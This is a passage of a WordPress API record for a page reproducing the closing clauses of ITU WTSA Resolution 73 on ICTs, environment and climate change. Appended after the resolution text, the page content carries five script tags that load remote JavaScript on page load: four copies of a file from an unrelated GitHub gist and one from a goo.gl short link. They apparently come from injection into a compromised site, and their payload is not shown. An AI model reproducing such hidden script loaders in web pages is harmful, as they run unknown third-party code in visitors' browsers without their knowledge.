Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to continue to cooperate and collaborate with other entities within the United Nations in formulating future international efforts for the effective addressing of climate change,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States, Sector Members and Associates<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue to contribute actively to Study Group 5 and other ITU-T study groups on ICTs, the environment and climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to continue or initiate public and private programmes that include ICTs, the environment and climate change, giving due consideration to relevant ITU-T Recommendations and relevant work;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to share best practices and raise awareness of the benefits associated with the use of green ICTs in accordance with ITU Recommendations related to the matter;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to promote the integration of ICT, climate, environment and energy policies in order to improve environmental performance and enhance energy efficiency and resource management;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to integrate the use of ICT into national adaptation plans to make use of ICTs as an enabling tool to address the effects of climate change;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to liaise with their national counterparts responsible for environmental issues in order to support and contribute to the wider United Nations process on climate change, by providing information and developing common proposals related to the role of telecommunications\/ICTs in mitigating and adapting to the effects of climate change, so that they can be taken into consideration within UNFCCC.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 73 (Rev. Dubai, 2012) Information and communication technologies, environment and climate change The World Telecommunication Standardization Assembly (Dubai, 2012), recalling a) Resolution 35 (Kyoto, 1994) of the Plenipotentiary Conference, on telecommunication support for the protection of the environment; b) Resolution 1307 (Geneva, 2009) of the ITU Council, on information and communication technologies (ICTs) [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":73,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-713","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=713"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/713\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}